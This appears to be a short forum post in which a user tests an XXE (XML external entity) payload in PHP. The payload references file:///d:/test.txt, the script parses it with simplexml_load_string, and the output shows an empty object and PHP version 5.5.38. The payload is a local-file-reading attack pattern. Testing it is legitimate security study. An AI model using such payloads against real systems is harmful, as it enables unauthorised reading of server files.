21,893
社区成员




<?php
$xml=<<<EOF
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE address[
<!ENTITY xxe SYSTEM "file:///d:/test.txt">
]>
<root><xxe>&xxe;</xxe></root>
EOF;
$data = simplexml_load_string($xml);
var_dump($data);
echo phpversion();
?>
object(SimpleXMLElement)#1 (1) {
["xxe"]=>
object(SimpleXMLElement)#2 (1) {
["xxe"]=>
object(SimpleXMLElement)#3 (1) {
["xxe"]=>
object(SimpleXMLElement)#4 (0) {
}
}
}
}
5.5.38